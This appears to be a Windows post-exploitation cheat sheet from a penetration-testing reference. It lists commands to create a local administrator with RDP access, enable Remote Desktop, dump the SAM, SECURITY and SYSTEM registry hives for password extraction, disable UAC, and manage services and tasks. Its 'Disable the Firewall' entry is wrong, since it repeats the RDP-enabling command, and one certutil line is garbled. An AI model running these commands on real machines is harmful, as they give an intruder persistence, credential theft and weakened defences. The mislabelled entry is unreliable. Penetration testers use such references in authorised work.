Add Admin User w/ RDP
net user <username> <password> /ADD
net localgroup administrators <username> /ADD
net localgroup "Remote Desktop Users" username /ADD
Tasks / Services
- Start or stop a service
net start|stop servicename - View the currently running tasklist
tasklist - Kill a task by name
taskkill /F /IM task.exe - Kill a task by PID
Taskkill /PID PID /F
Base64 encoding / decoding
- base64 encode
certutil -encode inputfile outputfile - base64 decode
cmd certutil -decode inputfile outputfile
Dump passwords
- via reg.exe
reg.exe save hklm\sam c:\sam_backup
reg.exe save hklm\security c:\security_backup
reg.exe save hklm\system c:\system
Security settings
- Allow RDP
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f - Disable UAC
reg enumkey -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\policies\\system
reg setval -v EnableLUA -d 0 -t REG_DWORD -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\policies\\system - Refresh policies
gpupdate /force - Disable the Firewall
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
Variables
- Show all variables
set - Windows TEMP folder
%TEMP% - Current domain and user (if whoami is not available)
echo %USERDOMAIN%\%USERNAME%
Location of files
- Repair files like SAM
c:\windows\repair\ - Windows TEMP folder
%TEMP% - Search for a specific file (wildcards are supported)
dir /S /P "filename"
